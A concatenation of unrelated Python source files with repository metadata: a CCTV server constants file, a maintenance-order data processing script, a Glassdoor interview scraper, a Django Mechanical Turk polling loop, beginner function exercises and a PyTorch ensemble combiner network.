a5dd6c145c898e85bf0c42c03f12cb0415330d74
|
[
"Apache-2.0"
] | null | null | null |
server/object_detection/Constants.py
|
KimSangYeon-DGU/Fire_Alarm_CCTV
|
a5dd6c145c898e85bf0c42c03f12cb0415330d74
|
[
"Apache-2.0"
] | 7
|
2019-06-19T05:44:23.000Z
|
2020-08-30T07:26:13.000Z
|
import socket as sock
import os
IP = sock.gethostname()
CCTV_PORT = 9000
ANDR_PORT = 8000
CUR_DIR = os.getcwd()
REC_DIR = os.path.join(CUR_DIR, "record")
DB_ADDR = "Database server address"
PUSH_ADDR = "Push notification server address"
REG_ID = "Registration ID"
NOTIF_COUNT = 4
QUEUE_SIZE = 30
REC_FILE_NUM = 60
NOTIF_MINIUTE = 10
| 18.666667
| 46
| 0.752976
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 84
| 0.25
|
afd20fab82d3922fc99876b2d016b1c0bd247c6a
| 7,878
|
py
|
Python
|
sanstitre1.py
|
mrrobotsca/NLP-AI2020
|
ff9c39f3a1d1dd2fbc57d596edf01d0e035d5b59
|
[
"Apache-2.0"
] | null | null | null |
sanstitre1.py
|
mrrobotsca/NLP-AI2020
|
ff9c39f3a1d1dd2fbc57d596edf01d0e035d5b59
|
[
"Apache-2.0"
] | 2
|
2021-06-08T21:48:56.000Z
|
2021-09-08T02:11:07.000Z
|
sanstitre1.py
|
mrrobotsca/NLP-AI2020
|
ff9c39f3a1d1dd2fbc57d596edf01d0e035d5b59
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 27 14:14:47 2019
@author: DK0086
"""
import odema as od
import numpy as np
from datetime import datetime
import pandas as pd
import geopy.distance
import math
import os
import time
import sys
from geopy.geocoders import Nominatim
geolocator = Nominatim(user_agent="Dash")
#######################################################################
# Part 1:
# Connect to the database of D3 orders and process the data
tec=pd.read_csv(r'Territoire_vs_technicien.csv', sep=";",encoding = "ISO-8859-1" )
sql = "SELECT MVW_BW_AVIS.AVIS, MVW_BW_AVIS.DESCRIPTION, MVW_BW_AVIS.TYP, MVW_BW_AVIS.DATE_AVIS, \
MVW_BW_AVIS.ANNEE_DATE_AVIS, MVW_BW_AVIS.MOIS_DATE_AVIS, MVW_BW_AVIS.STATSYS, MVW_BW_AVIS.STAT_UTIL, \
MVW_BW_AVIS.ORDRE, MVW_BW_ORDRES.DATE_CREATION, MVW_BW_AVIS.POSTETECHNIQUE, MVW_BW_AVIS.CODAGE, \
MVW_BW_AVIS.DIV, MVW_BW_AVIS.RESPONSABLE FROM ODEMA.MVW_BW_AVIS MVW_BW_AVIS LEFT OUTER JOIN ODEMA.MVW_BW_ORDRES MVW_BW_ORDRES ON (MVW_BW_AVIS.ORDRE = MVW_BW_ORDRES.ORDRE)"
div=tec.loc[:,'Division'].astype(str)
divv=[]
for row in div:
a=row
if len(a)==3:
a='0'+a
divv.append(a)
else:
divv.append(a)
localisation= tec.loc[:,'Désignation']
lon=[]
lat=[]
for row in localisation:
location = geolocator.geocode(row,timeout=15)
print(location.address)
lat.append(location.latitude)
lon.append(location.longitude)
tec['longitude']=lon
tec['latitude']=lat
tec['Division']=divv
tec.index = tec['Division']
df = od.read_odema(sql=sql)
test = df[df['DIV'].isin(divv)].copy()
test['IPOT'] = test['STAT_UTIL'].fillna('').str.contains('IPOT')
test['ANOI'] = test['STAT_UTIL'].fillna('').str.contains('ANOI')
test['AINF'] = test['STAT_UTIL'].fillna('').str.contains('AINF')
test["TYP"] = np.where(test['TYP'] == "D3",
np.where(test['IPOT'],
"D3-IPOT",
np.where(test['AINF'],
'D3-AINF',
np.where(test['ANOI'],
'D3-ANOI',
"D3-AUTRE")
)
),
test['TYP'])
R5=['R01','R02','R03','R04','R05']
R10=['R06','R07','R08','R09','R10']
test['R5_et_moins']=test['CODAGE'].isin(R5)
test['R6_et_plus']=test['CODAGE'].isin(R10)
test = test[test['CODAGE'].isin(R5) | test['CODAGE'].isin(R10)]
test = test[test['TYP'].isin(['D2','D4','D9','D3']) | test['TYP'].str.contains('D3')]
test['TYPE_CODE']=test['TYP']
test["Technicien"] = test["DIV"].map(tec["Techniciens"]).fillna("non-assigne")
test["Désignation"] = test["DIV"].map(tec["Désignation"]).fillna("non-assigne")
test["Territoires"] = test["DIV"].map(tec["Territoires"]).fillna("non-assigne")
test["longitude"] = test["DIV"].map(tec["latitude"]).fillna("non-assigne")
test["latitude"] = test["DIV"].map(tec["longitude"]).fillna("non-assigne")
testcopy = test.copy()
df_ordres = testcopy[testcopy['ORDRE'].notnull()].copy()
testcopy["date"] = testcopy["DATE_AVIS"]
df_ordres["date"] = df_ordres["DATE_CREATION"]
testcopy=testcopy[(testcopy.date.dt.year>=2012)& (testcopy.date.dt.year<=2020)]
df_ordres=df_ordres[(df_ordres.date.dt.year>=2012)& (df_ordres.date.dt.year<=2020)]
testcopy["TYP"] = testcopy["TYP"] + "-lances"
df_ordres["TYP"] = df_ordres["TYP"] + "-confirmes"
testcopy = testcopy.append(df_ordres)
del testcopy["DATE_AVIS"], testcopy["DATE_CREATION"], testcopy['AINF'], testcopy['ANOI'], testcopy['IPOT'], testcopy['R5_et_moins'], testcopy['R6_et_plus']
test["TYP"] = np.where(test['R5_et_moins'],test['TYP']+"-R5",test['TYP']+"-R10")
df_ordres = test[test['ORDRE'].notnull()].copy()
test["date"] = test["DATE_AVIS"]
df_ordres["date"] = df_ordres["DATE_CREATION"]
test=test[(test.date.dt.year>=2012)& (test.date.dt.year<=2020)]
df_ordres=df_ordres[(df_ordres.date.dt.year>=2012)& (df_ordres.date.dt.year<=2020)]
test["TYP"] = test["TYP"] + "-lances"
df_ordres["TYP"] = df_ordres["TYP"] + "-confirmes"
test = test.append(df_ordres)
del test["DATE_AVIS"], test["DATE_CREATION"],test['AINF'], test['ANOI'], test['IPOT'], test['R5_et_moins'], test['R6_et_plus']
test = test.append(testcopy)
#######################################################################
# Part 2:
# Connect to the database of 443 orders and process the data
sql_req_443 = \
"SELECT MVW_BW_ORDRES.TYPE, \
MVW_BW_ORDRES.CODE_NATURE, \
MVW_BW_ORDRES.ORDRE, \
MVW_BW_OPERATIONS_SM_PM.OPERATION_SM_PM, \
MVW_BW_ORDRES.DESIGNATION, \
MVW_BW_OPERATIONS_SM_PM.DESIGNATION_OPERATION_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.STATUTS_UTIL_COMPLET_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.STATUT_OP_COMPLET_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.DATE_STATUT_CONF_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.DATE_STATUT_LANC_SM_PM, \
MVW_BW_ORDRES.DIVISION_GRPE_GESTION, \
MVW_BW_ORDRES.DIVISION_POSTE_RESP, \
MVW_BW_ORDRES.POSTERESP \
FROM ODEMA.MVW_BW_ORDRES \
INNER JOIN ODEMA.MVW_BW_OPERATIONS_SM_PM \
ON (MVW_BW_ORDRES.ORDRE = MVW_BW_OPERATIONS_SM_PM.ORDRE_SM_PM) \
WHERE(MVW_BW_ORDRES.CODE_NATURE = '443')"
geolocator = Nominatim(user_agent="Dash")
df443 = od.read_odema(sql=sql_req_443)
df=pd.read_csv(r'Territoire_vs_technicien.csv', sep=";",encoding = "ISO-8859-1" )
div=df.loc[:,'Division'].astype(str)
divv=[]
for row in div:
a=row
if len(a)==3:
a='0'+a
divv.append(a)
else:
divv.append(a)
df['Division']=divv
localisation= df.loc[:,'Désignation']
lon=[]
lat=[]
for row in localisation:
location = geolocator.geocode(row,timeout=15)
print(location.address)
lat.append(location.latitude)
lon.append(location.longitude)
df['longitude']=lon
df['latitude']=lat
df.index = df['Division']
df443['chk'] = df443['DESIGNATION_OPERATION_SM_PM'].fillna('').str.lower().str.replace('é','e')
df443['TYPE_CODE'] = df443['TYPE'] + '-' + df443['CODE_NATURE']
df443['TYPE_CODE'] = np.where(df443['chk'].fillna("").str.contains('diagnostic')
,df443['TYPE_CODE'] + '-' + 'Diagnostic'
,df443['TYPE_CODE'] + '-' + 'Autre'
)
closed = df443[df443['DATE_STATUT_CONF_SM_PM'].notnull()].copy()
df443 = df443[df443['DATE_STATUT_LANC_SM_PM'].notnull()]  # not supposed to contain any nulls, but check anyway just to be safe
closed['date'] = closed['DATE_STATUT_CONF_SM_PM']
df443['date'] = df443['DATE_STATUT_LANC_SM_PM']
lst_champs = ['TYPE_CODE','TYPE','CODE_NATURE','ORDRE','DESIGNATION','OPERATION_SM_PM','DESIGNATION_OPERATION_SM_PM','date', 'DIVISION_GRPE_GESTION','DIVISION_POSTE_RESP']
closed = closed[lst_champs]
df443 = df443[lst_champs]
df443['TYP'] = df443['TYPE_CODE'] + '-lances'
closed['TYP'] = closed['TYPE_CODE'] + '-confirmes'
df443 = df443.append(closed)
df443['DIV'] = df443['DIVISION_POSTE_RESP']
df443["Technicien"] = df443["DIV"].map(df["Techniciens"]).fillna("non-assigne")
df443["Désignation"] = df443["DIV"].map(df["Désignation"]).fillna("non-assigne")
df443["Territoires"] = df443["DIV"].map(df["Territoires"]).fillna("non-assigne")
df443["longitude"] = df443["DIV"].map(df["latitude"]).fillna("non-assigne")
df443["latitude"] = df443["DIV"].map(df["longitude"]).fillna("non-assigne")
df443["TYP_STATUS"] = df443["TYP"]
df443['433'] = df443['CODE_NATURE'].fillna('').str.contains('433')
del closed
#tot=pd.concat([df443, test], ignore_index=True)
#tot.to_csv('tot.csv',sep=";")
| 37.514286
| 180
| 0.621351
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,700
| 0.469007
|
afd2843c7e52da7b669cdb447daf485dad48b407
| 4,398
|
py
|
Python
|
GlassdoorScrape/GlassdoorScrape/GlassdoorScrapeCore/GlassdoorScrapeInterviews.py
|
tlarsen7572/AlteryxTools
|
4bfaefbf59f7206215f42a6ca5b364f71c35fa1f
|
[
"BSD-2-Clause"
] | 9
|
2019-05-29T12:53:03.000Z
|
2020-07-01T13:26:12.000Z
|
GlassdoorScrape/GlassdoorScrape/GlassdoorScrapeCore/GlassdoorScrapeInterviews.py
|
tlarsen7572/AlteryxTools
|
4bfaefbf59f7206215f42a6ca5b364f71c35fa1f
|
[
"BSD-2-Clause"
] | 2
|
2018-07-20T00:23:46.000Z
|
2018-10-16T20:37:34.000Z
|
GlassdoorScrape/GlassdoorScrape/GlassdoorScrapeCore/GlassdoorScrapeInterviews.py
|
tlarsen7572/AlteryxTools
|
4bfaefbf59f7206215f42a6ca5b364f71c35fa1f
|
[
"BSD-2-Clause"
] | 2
|
2019-03-15T13:43:36.000Z
|
2020-04-27T00:15:53.000Z
|
import GlassdoorScrapeCore.GlassdoorScrapeUtilities as Ut
def decode_experience(html_string):
if html_string.find("Positive", 0) != -1:
return "Positive Experience"
elif html_string.find("Neutral", 0) != -1:
return "Neutral Experience"
elif html_string.find("Negative", 0) != -1:
return "Negative Experience"
return ""
def decode_offer(html_string):
if html_string.find("Accepted", 0) != -1:
return "Accepted Offer"
elif html_string.find("Declined", 0) != -1:
return "Declined Offer"
elif html_string.find("No Offer", 0) != -1:
return "No Offer"
return ""
def decode_difficulty(html_string):
if html_string.find("Hard", 0) != -1:
return "Hard"
elif html_string.find("Average", 0) != -1:
return "Average"
elif html_string.find("Easy", 0) != -1:
return "Easy"
elif html_string.find("Difficult", 0) != -1:
return "Difficult"
return ""
def decode_getting_interview(html_string):
html_string = html_string.upper()
if html_string.find(" ONLINE ", 0) != -1:
return "Online"
elif html_string.find("EMPLOY", 0) != -1:
return "Employee Referral"
elif html_string.find("RECRUITING", 0) != -1:
return "Campus Recruiting"
elif html_string.find("CAMPUS", 0) != -1:
return "Campus Recruiting"
return ""
def parse_html(html_string):
company_name = Ut.get_string_between(html_string, "</script><title>", "Interview Questions |", "")
print("Company Name: " + company_name)
interview_list = Ut.get_list_of_substrings(html_string, "<li class=' empReview cf ' id='InterviewReview", "</li>")
if len(interview_list) == 0:
interview_list = Ut.get_list_of_substrings(html_string,
"<li class=' lockedReview empReview cf ' id='InterviewReview_",
"</li>")
print("Interviews to parse: " + str(len(interview_list)))
# Each will have a list appended
output_listing = []
for main_list in range(0, len(interview_list)):
row = interview_list[main_list]
# Parse the current listing
row_list = []
# Company Name
_str = company_name
row_list.append(_str)
# Interview Date
_str = Ut.get_string_between(row, "datetime=\"", "\">", "")
row_list.append(_str)
# Title (Analyst Interview)
_str = Ut.get_string_between(row, "<span class='reviewer'>", "</span>", "")
_str = _str.strip()
row_list.append(_str)
# Experience
experience = Ut.get_string_between(row, "<div class='flex-grid'>",
"<p class=\"strong margTopMd tightBot\">Application</p>", "")
experience = experience.strip()
if len(experience) == 0:
experience = Ut.get_string_between(row, "<div class='flex-grid'>",
"<p class=\"strong margTopMd tightBot\">Interview</p>", "")
_str = decode_experience(experience)
row_list.append(_str)
# Offer
_str = decode_offer(experience)
row_list.append(_str)
# Difficulty
_str = decode_difficulty(experience)
row_list.append(_str)
# GettingInterview
_Application = Ut.get_string_between(row,
"<p class='applicationDetails mainText truncateThis wrapToggleStr '>",
"</p>", "")
_current = decode_getting_interview(_Application)
row_list.append(_current)
# Application
row_list.append(_Application)
# Interview (description/verbatim)
_str = Ut.get_string_between(row,
"<p class='interviewDetails mainText truncateThis wrapToggleStr '>",
"</p>", "")
row_list.append(_str)
# Interview (Questions)
_str = Ut.get_string_between(row,
"<span class='interviewQuestion noPadVert truncateThis wrapToggleStr ' data-truncate-words='70'>",
"class", "", True)
row_list.append(_str)
# append the list
output_listing.append(row_list)
return output_listing
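# Usage sketch (an added example): the decode_* helpers classify review text
# by substring matching. The snippet below is fabricated for illustration.
if __name__ == "__main__":
    snippet = "Neutral Experience ... No Offer ... Average Interview"
    print(decode_experience(snippet))   # Neutral Experience
    print(decode_offer(snippet))        # No Offer
    print(decode_difficulty(snippet))   # Average
    print(decode_getting_interview("Applied online via the careers page"))  # Online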
| 35.467742
| 135
| 0.571851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,274
| 0.289677
|
afd436ddbf34c2bee6a32af594d6e66622817288
| 8,626
|
py
|
Python
|
qurkexp/join/cron.py
|
marcua/qurk_experiments
|
453c207ff50e730aefb6e1118e0f93e33babdb0b
|
[
"BSD-3-Clause"
] | 1
|
2015-09-30T00:09:06.000Z
|
2015-09-30T00:09:06.000Z
|
qurkexp/join/cron.py
|
marcua/qurk_experiments
|
453c207ff50e730aefb6e1118e0f93e33babdb0b
|
[
"BSD-3-Clause"
] | null | null | null |
qurkexp/join/cron.py
|
marcua/qurk_experiments
|
453c207ff50e730aefb6e1118e0f93e33babdb0b
|
[
"BSD-3-Clause"
] | null | null | null |
import sys,os,base64,time,traceback
from datetime import datetime
ROOT = os.path.abspath('%s/../..' % os.path.abspath(os.path.dirname(__file__)))
sys.path.append(ROOT)
os.environ['DJANGO_SETTINGS_MODULE'] = 'qurkexp.settings'
SLEEP_TIME = 10
if __name__ == '__main__':
from django.conf import settings
from qurkexp.hitlayer.models import HitLayer, HIT
from qurkexp.join.models import *
hitlayer = HitLayer.get_instance()
def celeb_cb_generator(pid):
try:
pair = Pair.objects.get(pk=pid)
        except Exception:
return None
def f(hitid, allans):
for ans in allans:
resp = PairResp(pair=pair,
aid = ans['purk_aid'],
wid = ans['purk_wid'],
hid = hitid,
accept_time = ans['purk_atime'],
submit_time = ans['purk_stime'],
same = ans['same'] == 'yes')
resp.save()
if ans['same'] == 'yes':
pair.yes += 1
elif ans['same'] == 'no':
pair.no += 1
pair.save()
return f
def celeb_features_cb_generator(pk):
try:
fc = FeatureCeleb.objects.get(id=pk)
except Exception as e:
            print(e)
            traceback.print_exc()
return None
def gen_feature_responses(fr, ans):
for k,v in ans.items():
parts = k.split("_")
if len(parts) == 2 and parts[0] == "feature":
feature = Feature.objects.get(pk = int(parts[1]))
val = FeatureVal.objects.get(pk = int(v))
fra = FeatureRespAns(fr=fr,feature=feature,val=val)
fra.save()
def f(hitid, allans):
for ans in allans:
fr = FeatureRespMeta(celeb=fc,
aid = ans['purk_aid'],
wid = ans['purk_wid'],
hid = hitid,
accept_time = ans['purk_atime'],
submit_time = ans['purk_stime'])
fr.save()
gen_feature_responses(fr, ans)
return f
def celeb_batchpair_cb_generator(bid):
try:
batch = BPBatch.objects.get(pk=bid)
except Exception as e:
            print(e)
            traceback.print_exc()
return None
def gen_batchpair_responses(bprm, ans):
for k,v in ans.items():
parts = k.split("_")
if len(parts) == 3 and parts[0] == "radio":
left = int(parts[1])
right = int(parts[2])
pair = BPPair.objects.filter(bpbatch=bprm.batch).filter(left=left).get(right=right)
if v == "false":
same = False
elif v == "true":
same = True
else:
raise Exception("Incorrect radio value")
bpra = BPRespAns(bprm=bprm, pair=pair, same=same)
bpra.save()
#print "kv",k,v,same,bpra.same,bpra.id
#print len(bprm.bprespans_set.all()), bprm.bprespans_set.all()[0].id, bprm.bprespans_set.all()[1].id
def f(hitid, allans):
for ans in allans:
bprm = BPRespMeta(batch=batch,
aid = ans['purk_aid'],
wid = ans['purk_wid'],
hid = hitid,
accept_time = ans['purk_atime'],
submit_time = ans['purk_stime'])
bprm.save()
gen_batchpair_responses(bprm, ans)
return f
def sort_cb_generator(pk):
try:
cb = CompBatch.objects.get(id=pk)
except Exception as e:
            print(e)
            traceback.print_exc()
return None
def gen_comp_responses(crm, ans):
sort_type = crm.batch.experiment.sort_type
if sort_type == "cmp":
for k,v in ans.items():
parts = k.split("_")
if len(parts) == 4 and parts[0] == "order":
v1 = CompVal.objects.get(pk=int(parts[2]))
v2 = CompVal.objects.get(pk=int(parts[3]))
cra = CompRespAns(crm=crm, v1=v1, v2=v2, comp=v)
cra.save()
elif sort_type == "rating":
for k,v in ans.items():
parts = k.split("_")
if len(parts) == 2 and parts[0] == "rate":
cv = CompVal.objects.get(pk=int(parts[1]))
rra = RateRespAns(crm=crm, val=cv, rating=int(v))
rra.save()
else:
raise Exception("Unknown sort type")
def f(hitid, allans):
for ans in allans:
crm = CompRespMeta(batch=cb,
aid = ans['purk_aid'],
wid = ans['purk_wid'],
hid = hitid,
accept_time = ans['purk_atime'],
submit_time = ans['purk_stime'])
crm.save()
gen_comp_responses(crm, ans)
return f
hitlayer.register_cb_generator('celeb', celeb_cb_generator)
hitlayer.register_cb_generator('celeb_feature', celeb_features_cb_generator)
hitlayer.register_cb_generator('celeb_batchpair', celeb_batchpair_cb_generator)
hitlayer.register_cb_generator('sort', sort_cb_generator)
while True:
HitLayer.get_instance().check_hits()
print "going to sleep for %d sec" % (SLEEP_TIME)
time.sleep(SLEEP_TIME)
exit()
cmds = [#'python movie_batchpairs.py 211 10 naive movie_all_naive_10_1 5',
#'python movie_batchpairs.py 211 5 naive movie_all_naive_5_1 5',
#'python movie_batchpairs.py 211 2 smart movie_all_smart_2_1 5',
#'python movie_batchpairs.py 211 3 smart movie_all_smart_3_1 5',
#'python movie_batchpairs.py 211 5 smart movie_all_smart_5_1 5',
#'python generate_comparisons.py animals rating 27 5 1 5 animals-dangerous-rating-27-5-1-5-2',
#'python movie_batchpairs.py 211 5 naive movie_all_naive_5_3 5',
#'python generate_batchpairs.py 30 10 naive ordered 30-10-naive-ordered-20 5',
#'python generate_batchpairs.py 30 5 naive ordered 30-5-naive-ordered-20 5',
#'python generate_batchpairs.py 30 3 naive ordered 30-3-naive-ordered-20 5',
#'python generate_comparisons.py squares cmp 40 1 10 5 squares-cmp-40-1-10-5-1'
# 'python generate_comparisons.py squares rating 50 5 1 5 squares-skew-rating-50-5-1-5-3',
# 'python generate_comparisons.py squares rating 50 5 1 5 squares-skew-rating-50-5-1-5-4',
# 'python generate_comparisons.py squares cmp 40 1 5 5 squares-skew-cmp-40-1-5-5-1'
#'python generate_comparisons.py squares rating 5 5 1 1 test_eugene_10',
]
def runcmds(cmds):
for cmd in cmds:
            print(cmd)
os.system(cmd)
time.sleep(10)
while HIT.objects.filter(done=False).count() > 0:
HitLayer.get_instance().check_hits()
print "going to sleep for %d sec" % (SLEEP_TIME)
time.sleep(SLEEP_TIME)
def runcmd(cmd):
        print(cmd)
os.system(cmd)
time.sleep(10)
while HIT.objects.filter(done=False).count() > 0:
HitLayer.get_instance().check_hits()
print "going to sleep for %d sec" % (SLEEP_TIME)
time.sleep(SLEEP_TIME)
while len(cmds) > 0:
cmd = cmds.pop(0)
runcmd(cmd)
exit()
cmds = []
for actorid in range(1, 5+1):
cmds.append('python movie_comparisons.py cmp movie_all_smart_3_1 %d 1 5 5 movie_cmp_%d_1_5_5_v3' % (actorid, actorid))
runcmds(cmds)
cmds = []
for actorid in range(1, 5+1):
cmds.append('python movie_comparisons.py rating movie_all_smart_3_1 %d 5 1 5 movie_rat_%d_5_1_5_v3' % (actorid, actorid))
runcmds(cmds)
| 40.308411
| 131
| 0.504405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,991
| 0.230814
|
afd5a7231c757b5d59c10582041a64bcee61c37a
| 4,155
|
py
|
Python
|
30-Days-of-Python/Day_12.py
|
davidusken/Python
|
56d2103d6be1e7be850ba87a1ba1e113333ddf13
|
[
"MIT"
] | null | null | null |
30-Days-of-Python/Day_12.py
|
davidusken/Python
|
56d2103d6be1e7be850ba87a1ba1e113333ddf13
|
[
"MIT"
] | null | null | null |
30-Days-of-Python/Day_12.py
|
davidusken/Python
|
56d2103d6be1e7be850ba87a1ba1e113333ddf13
|
[
"MIT"
] | 1
|
2021-02-28T12:52:55.000Z
|
2021-02-28T12:52:55.000Z
|
# Day 12: Functions
# Exercises
# Define four functions: add, subtract, divide, and multiply. Each function should take two arguments, and they should print the result of the arithmetic operation indicated by the function name.
# When order matters for an operation, the first argument should be treated as the left operand, and the second argument should be treated as the right operand.
# For example, if the user passes in 6 and 2 to subtract, the result should be 4, not -4.
# You should also make sure that the user can’t pass in 0 as the second argument for divide. If the user provides 0, you should print a warning instead of calculating their division.
def add(firstvalue, secondvalue):
print(firstvalue + secondvalue)
def subtract(firstvalue, secondvalue):
print(firstvalue - secondvalue)
def divide(firstvalue, secondvalue):
    if secondvalue == 0:
        print("You can't do that!")  # warn instead of dividing by zero
        return
    print(firstvalue / secondvalue)
def multiply(firstvalue, secondvalue):
print(firstvalue * secondvalue)
# Main (input/menu)
firstvalue = int(input("Enter first value: "))
secondvalue = int(input("Enter second value: "))
userchoice = input("\nWhat operation do you wish to perform?\n1. Add\n2. Subtract\n3. Divide\n4. Multiply\nEnter choice: ")
if userchoice == "1":
add(firstvalue, secondvalue)
elif userchoice == "2":
subtract(firstvalue, secondvalue)
elif userchoice == "3":
divide(firstvalue, secondvalue)
elif userchoice == "4":
multiply(firstvalue, secondvalue)
else:
print("Invalid input, try again.")
# Define a function called print_show_info that has a single parameter. The argument passed to it will be a dictionary with some information about a T.V. show. For example:
# The print_show_info function should print the information stored in the dictionary, in a nice way. For example:
# Breaking Bad (2008) - 5 seasons - Remember you must define your function before calling it!
tv_show = {
"title": "Breaking Bad",
"seasons": 5,
"initial_release": 2008
}
def print_show_info(show):
print(f"{show['title']} ({show['initial_release']}) - {show['seasons']} seasons")
print_show_info(tv_show)
# Below you’ll find a list containing details about multiple TV series.
series = [
{"title": "Breaking Bad", "seasons": 5, "initial_release": 2008},
{"title": "Fargo", "seasons": 4, "initial_release": 2014},
{"title": "Firefly", "seasons": 1, "initial_release": 2002},
{"title": "Rick and Morty", "seasons": 4, "initial_release": 2013},
{"title": "True Detective", "seasons": 3, "initial_release": 2014},
{"title": "Westworld", "seasons": 3, "initial_release": 2016},
]
# Use your function, print_show_info, and a for loop, to iterate over the series list, and call your function once for each iteration, passing in each dictionary.
# You should end up with each series printed in the appropriate format.
for show in series:
print_show_info(show)
# Create a function to test if a word is a palindrome. A palindrome is a string of characters that are identical whether read forwards or backwards. For example, “was it a car or a cat I saw” is a palindrome.
# In the day 7 project, we saw a number of ways to reverse a sequence, and you can use this to verify whether a string is the same backwards as it is in its original order. You can also use a slicing approach.
# Once you’ve found whether or not a word is a palindrome, you should print the result to the user. Make sure to clean up the argument provided to the function. We should be stripping whitespace from both
# ends of the string, and we should convert it all to the same case, just in case we’re dealing with a name, like “Hannah”.
def palindrome_check():
userword = list(input("Enter the word you want to check: ").strip().lower())
reverseword = userword[0:]
reverseword.reverse()
if reverseword == userword:
print("That is indeed a palindrome.")
    elif reverseword != userword:  # compare by value, not identity
print("That is not a palindrome.")
else:
print("Something went terribly wrong, contact script author.")
palindrome_check()
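# Alternative sketch (an added example): the slicing approach mentioned above,
# in a single comparison and without mutating a list.
def is_palindrome(word):
    cleaned = word.strip().lower()
    return cleaned == cleaned[::-1]

print(is_palindrome("Hannah"))   # True
print(is_palindrome("racecar"))  # True
print(is_palindrome("python"))   # False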
| 43.736842
| 210
| 0.726113
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,880
| 0.690482
|
bb5df3fbda301f153649b52b26d0e9ba6ce8747f
| 24
|
py
|
Python
|
ckan_cloud_operator/providers/db/constants.py
|
MuhammadIsmailShahzad/ckan-cloud-operator
|
35a4ca88c4908d81d1040a21fca8904e77c4cded
|
[
"MIT"
] | 14
|
2019-11-18T12:01:03.000Z
|
2021-09-15T15:29:50.000Z
|
ckan_cloud_operator/providers/db/constants.py
|
MuhammadIsmailShahzad/ckan-cloud-operator
|
35a4ca88c4908d81d1040a21fca8904e77c4cded
|
[
"MIT"
] | 52
|
2019-09-09T14:22:41.000Z
|
2021-09-29T08:29:24.000Z
|
ckan_cloud_operator/providers/db/constants.py
|
MuhammadIsmailShahzad/ckan-cloud-operator
|
35a4ca88c4908d81d1040a21fca8904e77c4cded
|
[
"MIT"
] | 8
|
2019-10-05T12:46:25.000Z
|
2021-09-15T15:13:05.000Z
|
PROVIDER_SUBMODULE='db'
| 12
| 23
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4
| 0.166667
|
bb5dfba5c5533938d6a17b1b05c8c187bd4dad1b
| 3,450
|
py
|
Python
|
models/combiner/combiner_network.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
models/combiner/combiner_network.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
models/combiner/combiner_network.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
"""
Contains the trainable sub-network of an ensemble classifier.
Handles calling the training and evaluation.
"""
import torch
import torch.nn as nn
import torch.optim as optim
from matplotlib.pyplot import show
from utility.fusion_functions import (train_nn_combiner_model,
test_nn_combiner)
from definitions import (MODELS_TRAIN_OUTPUTS_FILE, MODELS_VAL_OUTPUTS_FILE,
MODELS_TEST_OUTPUTS_FILE,
BEST_COMBINER_MODEL)
from utility.utilities import FusionData, Features
class CombinerModel(nn.Module):
def __init__(self):
super(CombinerModel, self).__init__()
self.input_dim = 40 # Label count * base model count
self.model = nn.Sequential(
nn.Linear(self.input_dim, 32),
nn.BatchNorm1d(32),
nn.ReLU(),
nn.Linear(32, 10)
)
def forward(self, x):
x = x.flatten(start_dim=1)
x = self.model(x)
return x
if __name__ == '__main__':
run_train = True
run_test = True
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
print(device)
model_ensemble = CombinerModel()
if run_train:
optimizer = optim.Adam(model_ensemble.parameters(), lr=0.000020)
epochs = 100
batch_size = 32
feature_train = Features(feature_file=MODELS_TRAIN_OUTPUTS_FILE,
arg_names=['X', 'y'])
data_train = FusionData(features=[feature_train], do_reshape=False)
feature_val = Features(feature_file=MODELS_VAL_OUTPUTS_FILE,
arg_names=['X', 'y'])
data_val = FusionData(features=[feature_val], do_reshape=False)
train_nn_combiner_model(model=model_ensemble,
optimizer=optimizer,
train_data=data_train.get_data(),
val_data=data_val.get_data(),
best_model=BEST_COMBINER_MODEL,
device=device,
epochs=epochs,
batch_size=batch_size)
if run_test:
feature_test = Features(feature_file=MODELS_TEST_OUTPUTS_FILE,
arg_names=['X', 'y'])
data_test = FusionData(features=[feature_test], do_reshape=False)
model_ensemble.load_state_dict(torch.load(BEST_COMBINER_MODEL))
model_ensemble.eval()
test_nn_combiner(model=model_ensemble,
test_data=data_test.get_data(),
device=device,
verbose=True)
show()
"""
with logits, lr=0.000015, test: 0.872 (epoch 87) batchnormed, 0.871 without
with probabilities, lr=0.000025, test: 0.872 (epoch 46) batchnormed, 0.849 without
with softmax of probabilities, lr=0.000025 test: 0.872 (epoch 46) batchnormed, 0.814 without higher lr
with softmax of logits, lr=0.000020, 0.865, (epoch 46) batchnormed,
with logits:
test: 0.872 val: 0.892 val_loss: 0.2937 avg: 86.61% test_loss: 0.3840
optimizer = optim.Adam(model_ensemble.parameters(), lr=0.000015)
epochs = 92 # (87), 0.871 without batchnorm
batch_size = 32
self.model = nn.Sequential(
nn.Linear(self.input_dim, 32),
nn.BatchNorm1d(32),
nn.ReLU(),
#nn.Dropout(0.5),
nn.Linear(32, 10)
)
"""
| 35.9375
| 102
| 0.595072
| 446
| 0.129275
| 0
| 0
| 0
| 0
| 0
| 0
| 942
| 0.273043
|
bb5e3228f03e7078fb5aaf1eab536edafbe9b383
| 1,639
|
py
|
Python
|
gotools_rename.py
|
liuhewei/gotools-sublime
|
2c44f84024f9fd27ca5c347cab080b80397a32c2
|
[
"MIT"
] | 60
|
2016-04-06T15:28:11.000Z
|
2021-01-26T13:08:19.000Z
|
gotools_rename.py
|
liuhewei/gotools-sublime
|
2c44f84024f9fd27ca5c347cab080b80397a32c2
|
[
"MIT"
] | 19
|
2016-04-07T02:28:22.000Z
|
2019-05-16T14:32:14.000Z
|
gotools_rename.py
|
